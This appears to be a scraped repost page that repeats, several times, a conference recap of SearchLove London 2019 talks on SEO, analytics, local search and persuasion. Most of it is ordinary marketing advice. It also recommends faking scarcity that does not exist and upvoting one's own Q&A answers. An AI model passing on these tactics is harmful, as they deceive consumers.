If you take some time to understand the Web Dev roles at your company, then it will help you better communicate your needs as an SEO and get things rolled out. You can do this by:
Learning the language that they’re using. Do some research into the terminology as well as possible limitations of your ask. This will make you more credible and you’re more likely to be taken seriously.
A team of developers may have different KPIs than you. It may be beneficial to use something like revenue as a way to get them on board with the change you want to make.
Try to make every ask more collaborative rather than instructive. For example, instead of simply presenting “insert this code,” try “here’s some example code, maybe we can incorporate x elements. What do you think?” A conversation may be the difference in effecting change.
Prioritising your requests in an easily readable way for web dev teams is always a good idea. It will give them the most information on what needs to get done in what timeline.
SearchLove London 2019 - Miracle Inameti-Archibong - The Complete Guide to Actionable Speed Audits from Distilled
Faisal Anderson - ‘Spying On Google: Using Log File Analysis To Reveal Invaluable SEO Insights’
Log files contain hugely valuable insight on how Googlebot and other crawlers behave on your site. Rory uncovered why you should be looking at your logs as well as how to analyse them effectively to reveal big wins that you may have otherwise been unable to quantify.
Looking at log files is a great way to see the truest and freshest data on how Google is crawling your site. It’s most accurate because it’s the actual logs of how Google (and any other bot) is crawling your website.
Getting log file data can be tricky, so it’s helpful to ask devs about your hosting setup (if your server uses load balancing, the log files may be split between various hosts). You’ll want to get 6 months of data if you can.
The three main things to evaluate when you’re analysing log files
Crawl behavior: look at most and least crawled URLs, look at crawl frequency by depth and internal links
Budget waste: find low value urls (faceted nav, query params, etc.) there are likely some subdirectories you want crawled more than others
Site health: look for inconsistent server responses
Using Jupyter to do log file analysis is great because it’s reusable and you’ll be able to use it again and again.
SearchLoveLondon 2019 - Faisal Anderson - Spying on Google: Using Log File Analysis to Reveal Invaluable SEO Insights from Distilled
Dr Pete Myers - ‘Scaling Keyword Research: More Isn’t Better’
Dr Pete Myers discussed how more is not better when it comes to keyword research! Ditch the thousands of keywords and instead focus on a smaller set of keywords that actually matter for you or your clients. Below are his top tips:
Pete has developed a simple metric called RankVol to help determine the importance of a keyword
RankVol = 1 / (rank x square root of volume)
Using this metric is better than sorting by search volume, as often the highest volume keywords that a site is appearing for are not the most relevant
Lots of data in keyword research can be irrelevant. Using John Lewis as an example:
9% of keywords John Lewis ranks for are mis-spellings
Almost 20% of keywords they rank for are very close variants (plural vs. singular, for example)
Dr Pete provides a short script in his deck to group keywords to help strip out noise in your data set
If sitelinks appear for your website, Google thinks you’re a brand
A new SERP feature (‘best of’ carousel) is appearing in the US, and will likely be rolled out into Europe soon
This feature takes you to a heavily paid SERP, with lots of ads (some well-disguised!)
If a keyword has a heavily paid SERP, you should probably not bother trying to rank for it, as the pay-off will be small
‘People also ask’ is on 90% of searches - be sure to try and take advantage of this SERP space
To summarise, perception is everything with keyword research - make sure you filter out the noise!
SearchLove London 2019 - Dr. Pete Meyers - Scaling Keyword Research: More Isn't Better from Distilled
Lindsay Wassell - ‘Managing Multinational & Multilingual SEO in Motion’
Lindsay covered the many challenges involved in handling migrations involving multiple international site variants. Her key points are highlighted below:
Ask your dev team to make sure it’s possible to implement hreflang via XML sitemaps or on-page; then if there are problems implementing one method, you have another as a fall-back option
When deciding site structure and where international sites should be located (sub-folder? Subdomain? ccTLD?) bear in mind that there are no one-size-fits all solutions. It may be best to have a mixture of solutions, depending on each market.
If you have hreflang relationship issues, Lindsay advises to use Google Sheets to manage hreflang mappings, in combination with a script that can automatically generate XML sitemaps (link provided in her deck)
In order to encourage more people in your organisation to understand the importance of SEO and to make it a priority, highlight statistics such as traffic levels and revenue coming from organic search
Also keep in mind that every department has a wish list when it comes to a migration! Be tactical and tack onto other people’s wishlists to get SEO items implemented
As a final tip - check redirects before going live, as often dev teams will say it’s under control, and then there can be problems at the last minute
SearchLove London 2019 - Lindsay Wassell - Managing Multinational & Multilingual SEO in Motion from Distilled
Stacey MacNaught - ‘Actioning Search Intent - What To Do With All That Data’
By analysing search intent, you can gain a ton of really insightful data. Stacey discussed how you can utilise all of this data to optimise your site for organic search and ultimately increase revenue and traffic.
Traditionally, search intent is categorised broadly as navigational, informational, and transactional. However, it’s often unclear where things are categorised because sometimes keywords are really ambiguous. Often you can break these categories down into more specific categories.
In terms of targeting keywords on your site, look out for opportunities where you may not be delivering the right content based on what query you’re targeting.
For example, if you’re targeting an informational keyword with a transactional result, you’re not going to rank. This can be an opportunity for you to create the kind of page that will rank for a select query. If the phrase is “best ballet shoes” and the results are informational pages, then you shouldn’t be serving a transactional result.
If you can be objective about the topic at hand and you have someone qualified to write that content, then you should definitely do it.
If your rankings drop but revenue unaffected, it’s likely you’ve lost rankings on informational keywords
Don’t assume that users will come back of their own accord - work with PPC and get them to retarget to users who have read your content
Build out different audience lists according to the types of content or topics that users have been reading
Build out separate PPC campaigns for this so you can easily monitor results
Stacey saw CPA fall by -34% when she did this for a healthcare site
To generate content ideas, talk to the sales and customer service teams to find out what users are asking, then build content around it
You can also use Google Forms to survey previous customers to find out what drove their purchase
SearchLove London 2019 - Stacey MacNaught - Actioning Search Intent: What to Do with All That Data from Distilled
Will Critchlow - ‘Misunderstood Concepts at the Heart of SEO - Get An Edge By Understanding These Areas’
Most things in SEO can be boiled down to technical accessibility, relevance, quality, and authority. Or: can it be crawled, does it meet a keyword need, and is it trustworthy? However, some of the foundational elements of SEO are misunderstood.
Regarding crawlability, it’s important to understand how setting directives in robots.txt will impact your site if handled incorrectly.
Robots.txt directives do not cascade. For example, if you set a specific directive to disallow Googlebot from /example, that is the one it will follow. Even if you specify that * (all user agents) are disallowed from /dont-crawl elsewhere in the file, Googlebot will only follow it’s set directive not to crawl /example and still be able to crawl /dont-crawl.
The Google documentation, robots.txt checker in  GSC, and the open source parser tend to disagree on what is allowed and disallowed. So, you’ll need to do some testing to ensure that the directives you’re setting are what you intended.
We often have  a lot of intuition about how things like pagerank work, but too many of our recommendations are based on misconceptions about how authority flows
There are some huge changes coming to major browser cookie handling. The cookie window will be shorter, which means that a lot of traffic that’s currently classified as organic will be classified as direct. Understanding the language around the changes that are happening is, and will be, important
There are common misconceptions too about the meaning of ‘long tail keywords’
50% of Twitter respondents incorrectly think it means that there are many words in a query
40% understand the correct meaning, which is that they are keywords with low search volume
SearchLove London 2019 - Will Critchlow - Misunderstood Concepts at the Heart of SEO from Distilled
That's it for our London conference for another year. But the good news is we are heading to San Diego in March where we'll be getting some sun, sea and search at SearchLove San Diego!
If you have any questions about our conferences please leave a comment below or come and say hello over on Twitter.
from Marketing https://www.distilled.net/resources/searchlove-london-2019-round-up/ via http://www.rssmix.com/
0 notes
heavenwheel · 5 years
Text
SearchLove London 2019: The Great Big Round Up
On 14th and 15th October, we made our annual visit to The Brewery in London for our UK edition of SearchLove. This year’s conference was our most successful yet, not only in terms of the number of folks attending but also with regard to the high calibre of speakers who joined us over the jam-packed two days to share their invaluable industry insights. 
Let the show begin! #searchlove #seo pic.twitter.com/zDIRbbX2KG
— Udo Leinhäuser (@u_leinhaeuser) October 14, 2019
This post is a quick-fire summary of the knowledge our speakers had to share, plus their slides & a few photos from across the conference.  All sessions in their entirety will be available with a DistilledU membership in a couple of weeks' time. And don’t forget that if you feel you missed out this year,  make sure you sign up to our mailing list to be the first in the know for next year’s conference! Are you ready? Let’s get started!
Marie Haynes - ‘Practical Tips For Improving E-A-T’
Google’s algorithms are increasingly considering E-A-T components (expertise, authority and trust) when evaluating sites. Marie shared why and how to improve E-A-T so that you have the best chance at winning in the current and future search landscape.
One of the most important things to focus on is the accuracy of the information on your site. This is especially important if your pages are primarily YMYL (‘your money or your life’, in other words, content that can affect someone’s health, safety, financial stability, etc.).
Google’s quality raters use the quality raters guidelines as their textbook. If you take a look at the guidelines, you can get a better idea about what Google is actually looking at when they’re evaluating E-A-T components. Try doing a CTRL+F for your industry to see what they suggest for your vertical.
There are some practical things you can do on your site to help Google understand that you’re trustworthy and authoritative:
Have contact information available.
If you’re eCommerce, ensure that your refund policy and customer service information is clearly accessible.
Make sure your site is secure (HTTPS)
Have correct grammar. How your page reads is important!
Make sure that the information on your site doesn’t contradict any known facts, something called scientific consensus. Site all sources as necessary.
SearchLove London 2019 - Marie Haynes - Practical Tips for Improving E-A-T from Distilled
Sarah Gurbach - ‘Using Qualitative Data To Make Human-Centered Decisions’
SEOs have a huge amount of data to work with, but often, the data that gets overlooked is that which comes directly from the humans who are driving all of our data points.
By performing qualitative research in tandem with quantitative, we can get insights on the actual human wants, barriers, and confusions that drive our customers to make their decisions and move through the funnel.
Sarah’s steps to conducting qualitative research include:
Defining your objective. Write it as a question. Keep it specific, focused and simple.
Asking open-ended questions to customers to define the personas you should be targeting. Sarah recommends surveys of 10 questions to 5 customers that should only take around 20 minutes each. More than this will likely be redundant.
Actually observing our users to figure out what and how they’re searching and moving through the funnel.
You can then quantify this data by combining it with other data sources (i.e. PPC data, conversion data, etc.).
If you don’t have time to conduct surveys, then you can go to social media and ask a question!
Want more on questions you can ask your customers? Check out this resource from Sarah.
SearchLove London 2019 - Sarah Gurbach - Using Qualitative Data to Make Human-centered Decisions from Distilled
Greg Gifford - ‘Doc Brown’s Plutonium-Powered SEO Playbook’
Greg delivered an entertaining, informative and best of all highly actionable talk on local SEO. If you have physical locations for your business, you should not be neglecting your local SEO strategy! It’s important to remember that there is a different algorithm for local SEO compared to the traditional SERP, and therefore you need to approach local SEO slightly differently.
Greg’s key tips to nailing your local SEO strategy are as follows:
Links are weighted differently for local SEO! Make sure you acquire local links - quality, and whether these are follow or nofollow, matters far less than in the standard SERP. The key is to make sure your links are local - get your hands dirty with some old-school marketing and get out into your local community to build links from churches, businesses and community websites in your area.  
Content needs to actually be about your business and local area. If you can use your website copy for a site in another area, you’re doing it wrong. Also, make sure that your blog is a local destination - if your content is more localised than competitors, then you’ll be one step ahead of competitors. 
Citations are also important, but you only need a handful! Make sure you link to your website from places that customers will actually see, such as your Facebook, Twitter and other social profiles. Ensure your business information is accurate across platforms.
Reviews need to be strong across platforms - there’s no use having excellent reviews in Google My Business, and then bad reviews on TripAdvisor!
Google My Business is your new homepage, so make sure you give it some attention!
Bear in mind that users can not only ask questions but also answer them - make sure you create your own Q&A here and upvote your answers so that they appear at the top.
Also be aware that clicks from GMB are recorded as direct! If you use UTM tracking parameters, then you can update the tracking so that you can attribute it correctly to organic.
SearchLove London 2019 - Greg Gifford - Doc Brown's Plutonium-powered Local SEO Playbook from Distilled
Luke Carthy - ‘Finding Powerful CRO and UX Opportunities Using SEO Crawlers’
Luke Carthy discussed the importance of not always striving to drive more traffic, but making the most of the traffic you currently do have. More traffic does not necessarily equal more conversions! He explored different ways to identify opportunities using crawl software and custom extraction, and to use these insights to improve conversion rates on your website.
His top recommendations include:
Look at the internal search experience of users - do they get a ‘no results found’ page? What does this look like - does it provide a good user experience? Does it guide users to alternative products?
Custom extraction is an excellent way to mine websites for information (your own and especially competitors!)
Consider scraping product recommendations:
What products are competitor sites recommending? These are often based on dynamic algorithms, so provide a good insight into what products customers buy together
Also pay attention to the price of the recommended products vs. the main product - recommended items are often more expensive, to encourage users to spend more
Also consider scraping competitor sites for prices, review and stock
Are you cheaper than competitors?
Do competitors have popular products that you don’t have? What are their best and worst-performing products? Often category or search results pages are ordered by best-sellers, and you can take advantage of this by mining this information
To deepen your analysis, plugin other data such as log file data, Google Analytics, XML sitemaps and backlinks to try to understand how you can improve your current results, and to obtain comprehensive insights that you can share with the wider team
SearchLove London 2019 - Luke Carthy - Finding Powerful CRO and UX Opportunities Using SEO Crawlers from Distilled
Andi Jarvis - ‘The Science of Persuasion’
Human psychology affects consumers’ buying behavior tremendously. Andi covered how we as SEOs can better understand these factors to influence our SEO strategy and improve conversions.
Scarcity: you can create the impression of scarcity even when it doesn’t exist, by creating scarcity of time to drive demand. An example of this is how Hotels.com creates a sense of urgency by including things like “Only 4 rooms left!” Test and learn with different time scales (hours, days, weeks or more) to see what works best for your product offering.
Authority: building authority helps people understand who they should trust. When you’ve got authority, you are more likely to persuade people. You can build authority simply by talking about yourself, and by labelling yourself as an authority in your industry.
Likeability: The reason that influencer marketing works is due to the principle of liking: we prefer to buy from people who we are attracted to and who we aspire to be. If we can envision ourselves using a product or service by seeing ourselves in its marketing, then we are more likely to convert.
Pretty Little Thing has started doing this by incorporating two models to model clothing, to increase the likelihood of users identifying with their models
Purpose: People are more likely to buy when they feel they are contributing to a cause, for example, Pampers who has a partnership with Unicef, so consumers feel like they are doing a good deed when they buy Pampers products. This is known as cause-based or purpose-based marketing.
Social proofing: It’s been known for a long time that people are influenced by the behaviour of others. In the early 1800s, theatres would pay people to clap at the right moments in a show, to encourage others to join in. Similarly today, if a brand has several endorsements from celebrities or users, people are more likely to purchase their products.
Reciprocation: Offering customers a free gift (even if small) can have a positive impact on re-purchase rates. Make sure though that you evolve what you do if you have a regular purchase cycle - offer customers different gifts so that they don’t know what to expect, otherwise the positive effect wears off.
SearchLove London 2019 - Andi Jarvis - The Science of Persuasion from Distilled
Heather Physioc - ‘Building a Discoverability Powerhouse: Lessons From Integrating Organic Search, Paid Search & Performance Content’
Organic, paid content and the like all impact discoverability. Yet, in many organisations, these teams are siloed. Heather discussed tips for integrating and collaborating between teams to build a “discoverabilty powerhouse”.
There are definite obstacles to integrating marketing teams like paid, social, or organic.
It’s not unlikely that merging teams too much can actually diminish agility. Depending on what marketing needs are at different times, allow for independence of teams when it’s necessary to get a job done.
Every team has their own processes for getting things done. Don’t try to overhaul everything at once. Talk with each other to see where integration makes the most sense.
There are also clear wins when you’re able to collaborate effectively.
When you’re in harmony with each team, you can more seamlessly find opportunities for discoverability. This can ultimately lead to up-sells or cross-sells.
By working together, we can share knowledge more deeply and have richer data. We can then leverage this to capture as much of the SERP as possible.
Cross-training teams can help build empathy and trust. When separate teams gain an understanding of how and why certain tasks (i.e. keyword research) are done, it can help everyone work better together and streamline processes.
SearchLove London 2019 - Heather Physioc - Building a Discoverability Powerhouse from Distilled
Robin Lord - ‘Excel? It Would Be Easier To Go To Jupyter’
Robin, a senior consultant here at Distilled, demonstrated the various shortcomings of Excel and showed an easier, repeatable, and more effective way to get things done - using Jupyter Notebooks and Python.
Below we outline Robin’s main points:
Excel and Google Sheets are very error-prone - especially if you’re dealing with larger data sets! If you need to process a lot of data, then you should consider using Jupyter Notebooks, as it can handle much bigger data sets (think: analysing backlinks, doing keyword research, log file analysis)
Jupyter Notebooks are reusable: if you create a Jupyter script to do any repeatable task (i.e. reporting or keyword research) then you can reuse it. This makes your life much easier because you don’t have to go back and dissect an old process.
Jupyter allows you to use Regex. This gives a huge advantage over excel because it is far more efficient at allowing you to account for misspellings. This, for example, can give you a far more accurate chance at accounting for things like branded search query permutations.
Jupyter allows you to write notes and keep every step in your process ordered. This means that your methodology is noted and the next time you perform this task, you remember exactly the steps you took. This is especially useful for when clients ask you questions about your work weeks or months down the line!
Finally - Jupyter notebooks allow us to get answers that we can’t get from Excel. We’re able to not only consider the data set from new angles, but we also have more time to go about other tasks, such as thinking about client strategy or improving other processes.
Robin has so many slides it breaks Slideshare. Instead, you can download his slides from Dropbox.
Jes Scholz - ‘Giving Robots An All Access Pass’
Jes Scholz uses the analogy of a nightclub to explain how Googlebot interacts with your website. The goal? To become part of the exclusive “Club Valid”. Her main points are outlined below:
As stated by John Mueller himself, “crawl budget is overrated - most sites never need to worry about this”. So instead of focusing on how much Google is crawling your site, you should be most concerned with how Google is crawling it
Status codes are not good or bad - there are right codes and wrong codes for different situations
In a similar vein, duplicate content is not “bad”, in fact, it’s entirely natural. You just need to make sure that you’re handling it correctly
JavaScript is your ticket to better UX, however, bear in mind that this often presents a host of SEO difficulties. Make sure that you don’t rely on the mobile friendly testing tool to see if Google is able to crawl your JavaScript - this tool actually uses different software to Googlebot (this is a common misconception!) The URL inspection tool is a bit better for checking this, however, bear in mind it’s more patient that Googlebot when it comes to rendering JavaScript, so isn’t 100% accurate.
SearchLove London 2019 - Jes Scholtz - Giving Robots an All Access Pass from Distilled
Rand Fishkin - ‘The Search Landscape in 2019’
As the web evolves, it’s important to evaluate the areas you could invest in carefully. Rand explored the key changes affecting search marketers and how SEOs can take these changes into account when determining strategy.
Should you invest in voice search? It’s probably a bit too early. There is little difference in the results you get from a voice search vs. a manual search.
Both mobile and desktop are big - don’t neglect one at the expense of the other!
The zero-click search is where the biggest search growth is happening right now. It now accounts for about half (48.96% in the US) of all searches!
If you could benefit from answering zero-click searches, then you should prepare for that. You can determine whether you’d benefit by evaluating the value in ranking for a particular query without necessarily getting traffic.
With changes in Google search appearance recently, ads have become more seamless in the SERP. This has led to paid click-through-rate rising a lot. However, if history is correct, then it will probably slowly decline until the next big search change.
As Google’s algorithms evolve, you’ll likely receive huge ranking benefits from focusing on growing authority signals (E-A-T).
Check out Rand’s slides to see where you should be spending your time and money as the search landscape evolves.
SearchLove London 2019 - Rand Fishkin - The Search Landscape in 2019 from Distilled
Emily Potter - ‘Can Anything in SEO Be Proven? A Deep-Dive Into SEO Split-Testing’
Split testing SEO changes allow us to say with confidence whether or not a specific change hurts or helps organic traffic. Emily discusses various SEO split tests she’s run and potential reasons for their outcome.
The main levers for SEO tend to boil down to
1. Improving organic click-through-rate (CTR)
2. Improving organic rankings of current keywords
3. Ranking for new keywords
Split testing changes that we want to make to our site can help us to make business cases, rescue sessions, and gain a competitive advantage.
Determining which of the three levers causes a particular test to be positive or negative is challenging because since they all impact each other, the data is noisy. Measuring organic sessions relieves us of this noise.
Following “best practices” or what your competitors are doing is not always going to result in wins. Testing shows you what actually works for your site. For example, adding quantity of products in your titles or structured data for breadcrumbs might actually negatively impact your SEO, even if it seems like everyone else is doing so.
Check out Emily’s slides to see more split test case studies and learnings!
Lessons from another year in SEO A/B Testing - SearchLove London 2019 from Emily Potter
Jill Quick - ‘Segments: How To Get Juicy Insights & Avoid The Pips!’
In her excellent talk, Jill highlights how “average data gives you average insights”, and discusses the importance of segmenting your data to gain deeper insights into user behaviour. While analytics and segments are awesome, don’t become overwhelmed with the possibilities - focus on your strategy and work from there.
Jill’s other tips include:
Adding custom dimensions to forms on your website allows you to create more relevant and specific data segments
For example, if you have a website in the education sector, you can add custom dimensions to a form that asks people to fill in their profession.  You can then create a segment where custom dimension = headteacher, and you can then analyse the behaviour of this specific group of people
Build segments that look at your best buyers (people who convert well) as well as your worst customers (those who spend barely any time on site and never convert). You can learn a lot about your ideal customer, as well as what you need to improve on your site, by doing this.
Use your segments to build retargeting lists - this will usually result in lower CPAs for paid search, helping your PPC budget go further
Don’t forget to use advanced segments (using sequences and conditions) to create granular segments that matter to your business
You can use segments in Google Data Studio, which is awesome! Just bear in mind that in Data Studio you can’t see if your segment data is sampled, so it’s best to go into the GA interface to check
If you want to hear more about Jill's session, she's written a post to supplement her slides.
Segments in Google Analytics from The Coloring In Department
Rory Truesdale - ‘Using The SERPs to Know Your Audience’
It can be easy to get lost in evaluating metrics like monthly search volume, but we often forget that for each query, there is a person with a very specific motivation and need. Rory discussed how we can utilise Google’s algorithmic re-writing of the SERP to help identify those motivations and more effectively optimise for search intent - the SERPs give us amazing insight into what customers want!
Google rewrites the SERP displayed meta description 84% of the time (it thinks it’s smarter than us!) However, we can use this rewrite data to our advantage.
The best ways to get SERP data are through crawling SERPs in screaming frog, the scraper API or chrome extension, “Thruuu” (a SERP analysis tool), and then using Jupyter Notebooks to analyse it.
Scraping of SERPs, product reviews, comments, or reddit forums can be really powerful in that it will give you a data source that can reveal insight about what your customers want. Then you can optimise the content on your pages to appeal to them.
If you can get a better idea about what language and tone resonates with users, you can incorporate it into CTAs and content.
Check our Rory’s slides as well as the Jupyter notebook he uses to analyse SERP data.
SearchLove London 2019 - Rory Truesdale - Using the SERPs to Know Your Audience from Distilled
Miracle Inameti Archibong - ‘The Complete Guide To Actionable Speed Audits: Getting Your Developer To Work With You’
It can be a huge challenge to get devs to implement our wishlist of SEO recommendations. Miracle discussed the practical steps to getting developers to take your recommendations seriously.
If you take some time to understand the Web Dev roles at your company, then it will help you better communicate your needs as an SEO and get things rolled out. You can do this by:
Learning the language that they’re using. Do some research into the terminology as well as possible limitations of your ask. This will make you more credible and you’re more likely to be taken seriously.
A team of developers may have different KPIs than you. It may be beneficial to use something like revenue as a way to get them on board with the change you want to make.
Try to make every ask more collaborative rather than instructive. For example, instead of simply presenting “insert this code,” try “here’s some example code, maybe we can incorporate x elements. What do you think?” A conversation may be the difference in effecting change.
Prioritising your requests in an easily readable way for web dev teams is always a good idea. It will give them the most information on what needs to get done in what timeline.
SearchLove London 2019 - Miracle Inameti-Archibong - The Complete Guide to Actionable Speed Audits from Distilled
Faisal Anderson - ‘Spying On Google: Using Log File Analysis To Reveal Invaluable SEO Insights’
Log files contain hugely valuable insight on how Googlebot and other crawlers behave on your site. Rory uncovered why you should be looking at your logs as well as how to analyse them effectively to reveal big wins that you may have otherwise been unable to quantify.
Looking at log files is a great way to see the truest and freshest data on how Google is crawling your site. It’s most accurate because it’s the actual logs of how Google (and any other bot) is crawling your website.
Getting log file data can be tricky, so it’s helpful to ask devs about your hosting setup (if your server uses load balancing, the log files may be split between various hosts). You’ll want to get 6 months of data if you can.
The three main things to evaluate when you’re analysing log files
Crawl behavior: look at most and least crawled URLs, look at crawl frequency by depth and internal links
Budget waste: find low value urls (faceted nav, query params, etc.) there are likely some subdirectories you want crawled more than others
Site health: look for inconsistent server responses
Using Jupyter to do log file analysis is great because it’s reusable and you’ll be able to use it again and again.
SearchLoveLondon 2019 - Faisal Anderson - Spying on Google: Using Log File Analysis to Reveal Invaluable SEO Insights from Distilled
Dr Pete Myers - ‘Scaling Keyword Research: More Isn’t Better’
Dr Pete Myers discussed how more is not better when it comes to keyword research! Ditch the thousands of keywords and instead focus on a smaller set of keywords that actually matter for you or your clients. Below are his top tips:
Pete has developed a simple metric called RankVol to help determine the importance of a keyword
RankVol = 1 / (rank x square root of volume)
Using this metric is better than sorting by search volume, as often the highest volume keywords that a site is appearing for are not the most relevant
Lots of data in keyword research can be irrelevant. Using John Lewis as an example:
9% of keywords John Lewis ranks for are mis-spellings
Almost 20% of keywords they rank for are very close variants (plural vs. singular, for example)
Dr Pete provides a short script in his deck to group keywords to help strip out noise in your data set
If sitelinks appear for your website, Google thinks you’re a brand
A new SERP feature (‘best of’ carousel) is appearing in the US, and will likely be rolled out into Europe soon
This feature takes you to a heavily paid SERP, with lots of ads (some well-disguised!)
If a keyword has a heavily paid SERP, you should probably not bother trying to rank for it, as the pay-off will be small
‘People also ask’ is on 90% of searches - be sure to try and take advantage of this SERP space
To summarise, perception is everything with keyword research - make sure you filter out the noise!
SearchLove London 2019 - Dr. Pete Meyers - Scaling Keyword Research: More Isn't Better from Distilled
Lindsay Wassell - ‘Managing Multinational & Multilingual SEO in Motion’
Lindsay covered the many challenges involved in handling migrations involving multiple international site variants. Her key points are highlighted below:
Ask your dev team to make sure it’s possible to implement hreflang via XML sitemaps or on-page; then if there are problems implementing one method, you have another as a fall-back option
When deciding site structure and where international sites should be located (sub-folder? Subdomain? ccTLD?) bear in mind that there are no one-size-fits all solutions. It may be best to have a mixture of solutions, depending on each market.
If you have hreflang relationship issues, Lindsay advises to use Google Sheets to manage hreflang mappings, in combination with a script that can automatically generate XML sitemaps (link provided in her deck)
In order to encourage more people in your organisation to understand the importance of SEO and to make it a priority, highlight statistics such as traffic levels and revenue coming from organic search
Also keep in mind that every department has a wish list when it comes to a migration! Be tactical and tack onto other people’s wishlists to get SEO items implemented
As a final tip - check redirects before going live, as often dev teams will say it’s under control, and then there can be problems at the last minute
SearchLove London 2019 - Lindsay Wassell - Managing Multinational & Multilingual SEO in Motion from Distilled
Stacey MacNaught - ‘Actioning Search Intent - What To Do With All That Data’
By analysing search intent, you can gain a ton of really insightful data. Stacey discussed how you can utilise all of this data to optimise your site for organic search and ultimately increase revenue and traffic.
Traditionally, search intent is categorised broadly as navigational, informational, and transactional. However, it’s often unclear where things are categorised because sometimes keywords are really ambiguous. Often you can break these categories down into more specific categories.
In terms of targeting keywords on your site, look out for opportunities where you may not be delivering the right content based on what query you’re targeting.
For example, if you’re targeting an informational keyword with a transactional result, you’re not going to rank. This can be an opportunity for you to create the kind of page that will rank for a select query. If the phrase is “best ballet shoes” and the results are informational pages, then you shouldn’t be serving a transactional result.
If you can be objective about the topic at hand and you have someone qualified to write that content, then you should definitely do it.
If your rankings drop but revenue unaffected, it’s likely you’ve lost rankings on informational keywords
Don’t assume that users will come back of their own accord - work with PPC and get them to retarget to users who have read your content
Build out different audience lists according to the types of content or topics that users have been reading
Build out separate PPC campaigns for this so you can easily monitor results
Stacey saw CPA fall by -34% when she did this for a healthcare site
To generate content ideas, talk to the sales and customer service teams to find out what users are asking, then build content around it
You can also use Google Forms to survey previous customers to find out what drove their purchase
SearchLove London 2019 - Stacey MacNaught - Actioning Search Intent: What to Do with All That Data from Distilled
Will Critchlow - ‘Misunderstood Concepts at the Heart of SEO - Get An Edge By Understanding These Areas’
Most things in SEO can be boiled down to technical accessibility, relevance, quality, and authority. Or: can it be crawled, does it meet a keyword need, and is it trustworthy? However, some of the foundational elements of SEO are misunderstood.
Regarding crawlability, it’s important to understand how setting directives in robots.txt will impact your site if handled incorrectly.
Robots.txt directives do not cascade. For example, if you set a specific directive to disallow Googlebot from /example, that is the one it will follow. Even if you specify that * (all user agents) are disallowed from /dont-crawl elsewhere in the file, Googlebot will only follow it’s set directive not to crawl /example and still be able to crawl /dont-crawl.
The Google documentation, robots.txt checker in  GSC, and the open source parser tend to disagree on what is allowed and disallowed. So, you’ll need to do some testing to ensure that the directives you’re setting are what you intended.
We often have  a lot of intuition about how things like pagerank work, but too many of our recommendations are based on misconceptions about how authority flows
There are some huge changes coming to major browser cookie handling. The cookie window will be shorter, which means that a lot of traffic that’s currently classified as organic will be classified as direct. Understanding the language around the changes that are happening is, and will be, important
There are common misconceptions too about the meaning of ‘long tail keywords’
50% of Twitter respondents incorrectly think it means that there are many words in a query
40% understand the correct meaning, which is that they are keywords with low search volume
SearchLove London 2019 - Will Critchlow - Misunderstood Concepts at the Heart of SEO from Distilled
That's it for our London conference for another year. But the good news is we are heading to San Diego in March where we'll be getting some sun, sea and search at SearchLove San Diego!
If you have any questions about our conferences please leave a comment below or come and say hello over on Twitter.
from Digital https://www.distilled.net/resources/searchlove-london-2019-round-up/ via http://www.rssmix.com/
0 notes
davidrsmithlove · 5 years
Text
SearchLove London 2019: The Great Big Round Up
On 14th and 15th October, we made our annual visit to The Brewery in London for our UK edition of SearchLove. This year’s conference was our most successful yet, not only in terms of the number of folks attending but also with regard to the high calibre of speakers who joined us over the jam-packed two days to share their invaluable industry insights. 
Let the show begin! #searchlove #seo pic.twitter.com/zDIRbbX2KG
— Udo Leinhäuser (@u_leinhaeuser) October 14, 2019
This post is a quick-fire summary of the knowledge our speakers had to share, plus their slides & a few photos from across the conference.  All sessions in their entirety will be available with a DistilledU membership in a couple of weeks' time. And don’t forget that if you feel you missed out this year,  make sure you sign up to our mailing list to be the first in the know for next year’s conference! Are you ready? Let’s get started!
Marie Haynes - ‘Practical Tips For Improving E-A-T’
Google’s algorithms are increasingly considering E-A-T components (expertise, authority and trust) when evaluating sites. Marie shared why and how to improve E-A-T so that you have the best chance at winning in the current and future search landscape.
One of the most important things to focus on is the accuracy of the information on your site. This is especially important if your pages are primarily YMYL (‘your money or your life’, in other words, content that can affect someone’s health, safety, financial stability, etc.).
Google’s quality raters use the quality raters guidelines as their textbook. If you take a look at the guidelines, you can get a better idea about what Google is actually looking at when they’re evaluating E-A-T components. Try doing a CTRL+F for your industry to see what they suggest for your vertical.
There are some practical things you can do on your site to help Google understand that you’re trustworthy and authoritative:
Have contact information available.
If you’re eCommerce, ensure that your refund policy and customer service information is clearly accessible.
Make sure your site is secure (HTTPS)
Have correct grammar. How your page reads is important!
Make sure that the information on your site doesn’t contradict any known facts, something called scientific consensus. Site all sources as necessary.
SearchLove London 2019 - Marie Haynes - Practical Tips for Improving E-A-T from Distilled
Sarah Gurbach - ‘Using Qualitative Data To Make Human-Centered Decisions’
SEOs have a huge amount of data to work with, but often, the data that gets overlooked is that which comes directly from the humans who are driving all of our data points.
By performing qualitative research in tandem with quantitative, we can get insights on the actual human wants, barriers, and confusions that drive our customers to make their decisions and move through the funnel.
Sarah’s steps to conducting qualitative research include:
Defining your objective. Write it as a question. Keep it specific, focused and simple.
Asking open-ended questions to customers to define the personas you should be targeting. Sarah recommends surveys of 10 questions to 5 customers that should only take around 20 minutes each. More than this will likely be redundant.
Actually observing our users to figure out what and how they’re searching and moving through the funnel.
You can then quantify this data by combining it with other data sources (i.e. PPC data, conversion data, etc.).
If you don’t have time to conduct surveys, then you can go to social media and ask a question!
Want more on questions you can ask your customers? Check out this resource from Sarah.
SearchLove London 2019 - Sarah Gurbach - Using Qualitative Data to Make Human-centered Decisions from Distilled
Greg Gifford - ‘Doc Brown’s Plutonium-Powered SEO Playbook’
Greg delivered an entertaining, informative and best of all highly actionable talk on local SEO. If you have physical locations for your business, you should not be neglecting your local SEO strategy! It’s important to remember that there is a different algorithm for local SEO compared to the traditional SERP, and therefore you need to approach local SEO slightly differently.
Greg’s key tips to nailing your local SEO strategy are as follows:
Links are weighted differently for local SEO! Make sure you acquire local links - quality, and whether these are follow or nofollow, matters far less than in the standard SERP. The key is to make sure your links are local - get your hands dirty with some old-school marketing and get out into your local community to build links from churches, businesses and community websites in your area.  
Content needs to actually be about your business and local area. If you can use your website copy for a site in another area, you’re doing it wrong. Also, make sure that your blog is a local destination - if your content is more localised than competitors, then you’ll be one step ahead of competitors. 
Citations are also important, but you only need a handful! Make sure you link to your website from places that customers will actually see, such as your Facebook, Twitter and other social profiles. Ensure your business information is accurate across platforms.
Reviews need to be strong across platforms - there’s no use having excellent reviews in Google My Business, and then bad reviews on TripAdvisor!
Google My Business is your new homepage, so make sure you give it some attention!
Bear in mind that users can not only ask questions but also answer them - make sure you create your own Q&A here and upvote your answers so that they appear at the top.
